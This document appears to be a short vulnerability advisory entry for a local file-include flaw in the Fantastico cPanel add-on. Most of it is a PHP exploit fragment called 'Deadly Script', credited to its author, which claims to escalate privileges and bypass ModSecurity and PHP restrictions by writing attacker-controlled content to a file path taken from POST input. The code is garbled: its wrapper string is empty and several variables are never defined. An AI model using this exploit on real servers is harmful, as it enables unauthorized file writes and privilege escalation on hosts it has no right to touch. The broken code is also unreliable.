source: https://www.securityfocus.com/bid/32578/info
Fantastico is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit... ";
echo "coding by Super-Crystal ";
echo "Cleaning up ";
echo "Done!
";
} else {
echo "error : ".php_uname();
}
} else {
?>
Deadly Script
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"